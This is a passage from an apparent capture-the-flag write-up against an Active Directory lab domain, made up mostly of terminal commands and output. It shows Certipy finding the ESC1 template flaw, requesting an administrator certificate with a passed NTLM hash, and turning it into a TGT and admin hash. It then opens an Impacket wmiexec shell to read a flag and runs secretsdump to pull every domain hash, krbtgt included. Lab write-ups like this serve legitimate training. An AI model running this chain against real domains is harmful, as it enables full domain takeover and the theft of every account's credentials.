[+] Trying to get DCOM connection for: 10.6.6.55
[!] Got error while trying to get CA configuration for 'cyberstrikelab-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cyberstrikelab-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'DC.cyberstrikelab.com' (10.6.6.55)
[*] Got CA configuration for 'cyberstrikelab-DC-CA'
[+] Resolved 'DC.cyberstrikelab.com' from cache: 10.6.6.55
[+] Connecting to 10.6.6.55:80
[*] Saved BloodHound data to '20250522202934_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250522202934_Certipy.txt'
[*] Saved JSON output to '20250522202934_Certipy.json'

ESC1

❯ cat 20250522202934_Certipy.txt
Certificate Authorities0CA Name                             : cyberstrikelab-DC-CADNS Name                            : DC.cyberstrikelab.comCertificate Subject                 : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=comCertificate Serial Number           : 652A47597C7F03824B7815EBE474E40BCertificate Validity Start          : 2025-04-22 07:45:38+00:00Certificate Validity End            : 2030-04-22 07:55:38+00:00Web Enrollment                      : EnabledUser Specified SAN                  : DisabledRequest Disposition                 : IssueEnforce Encryption for Requests     : EnabledPermissionsOwner                             : CYBERSTRIKELAB.COM\AdministratorsAccess RightsManageCertificates              : CYBERSTRIKELAB.COM\AdministratorsCYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Enterprise AdminsManageCa                        : CYBERSTRIKELAB.COM\AdministratorsCYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Enterprise AdminsEnroll                          : CYBERSTRIKELAB.COM\Authenticated Users[!] VulnerabilitiesESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates0Template Name                       : DCDisplay Name                        : DCCertificate Authorities             : cyberstrikelab-DC-CAEnabled                             : TrueClient Authentication               : TrueEnrollment Agent                    : FalseAny Purpose                         : FalseEnrollee Supplies Subject           : TrueCertificate Name Flag               : EnrolleeSuppliesSubjectEnrollment Flag                     : NonePrivate Key Flag                    : 16842752Extended Key Usage                  : Client AuthenticationRequires Manager Approval           : FalseRequires Key Archival               : FalseAuthorized Signatures Required      : 0Validity Period                     : 1 yearRenewal Period                      : 6 weeksMinimum RSA Key Length              : 2048PermissionsEnrollment PermissionsEnrollment Rights               : CYBERSTRIKELAB.COM\Domain UsersCYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Domain ComputersCYBERSTRIKELAB.COM\Enterprise AdminsCYBERSTRIKELAB.COM\Authenticated UsersObject Control PermissionsOwner                           : CYBERSTRIKELAB.COM\AdministratorWrite Owner Principals          : CYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Enterprise AdminsCYBERSTRIKELAB.COM\AdministratorWrite Dacl Principals           : CYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Enterprise AdminsCYBERSTRIKELAB.COM\AdministratorWrite Property Principals       : CYBERSTRIKELAB.COM\Domain AdminsCYBERSTRIKELAB.COM\Enterprise AdminsCYBERSTRIKELAB.COM\Administrator[!] VulnerabilitiesESC1                              : 'CYBERSTRIKELAB.COM\\Domain Users', 'CYBERSTRIKELAB.COM\\Domain Computers' and 'CYBERSTRIKELAB.COM\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

ESC1 直接梭哈- -

❯ certipy  req -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517  -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -template DC  -ca cyberstrikelab-DC-CA -debug -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.6.6.55[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

❯ certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COM
Certipy v4.8.2 - by Oliver Lyak (ly4k)[*] Using principal: administrator@cyberstrikelab.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa

flag3

❯ wmiexec.py cyberstrike.com/administrator@10.6.6.55  -hashes :28cfbc91020438f2a064a63fff9871fa
/opt/homebrew/bin/wmiexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html__import__('pkg_resources').run_script('impacket==0.11.0', 'wmiexec.py')
Impacket v0.11.0 - Copyright 2023 Fortra[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:/flag.txt
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����﷨����ȷ��C:\>dir c:/
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
��Ч���� - ""��C:\>dir c:\
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec������ C �еľ�û�б�ǩ���������к��� 2C36-C1B6c:\ ��Ŀ¼2025/04/22  16:37                45 flag.txt
2025/04/22  15:53    <DIR>          inetpub
2025/04/22  15:43    <DIR>          PerfLogs
2018/02/03  03:38    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2025/04/22  15:54    <DIR>          Users
2025/05/22  20:39    <DIR>          Windows1 ���ļ�             45 �ֽ�6 ��Ŀ¼ 26,064,306,176 �����ֽ�C:\>type c:\flag.txt
go-flag{1DDE774EFA}
C:\>

hashdump

❯ secretsdump.py cyberstrike.com/administrator@10.6.6.55  -just-dc-ntlm  -dc-ip 10.6.6.55  -hashes :28cfbc91020438f2a064a63fff9871fa
/opt/homebrew/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html__import__('pkg_resources').run_script('impacket==0.11.0', 'secretsdump.py')
Impacket v0.11.0 - Copyright 2023 Fortra[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:313b2b933939ece9a1f4ed13b58fd145:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:331dcbb88d1a4847c97eab7c1c168ac8:::
[*] Cleaning up...